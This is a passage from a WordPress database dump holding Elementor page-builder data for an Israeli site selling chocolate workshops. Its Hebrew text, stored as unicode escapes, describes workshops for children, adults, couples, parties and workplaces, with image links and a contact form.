\\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2310,433,'_elementor_edit_mode','builder'),(2311,433,'_elementor_template_type','wp-page'),(2312,433,'_elementor_version','2.7.5'),(2313,433,'_elementor_pro_version','2.7.3'),(2314,433,'_wp_page_template','elementor_header_footer'),(2315,433,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2316,433,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas 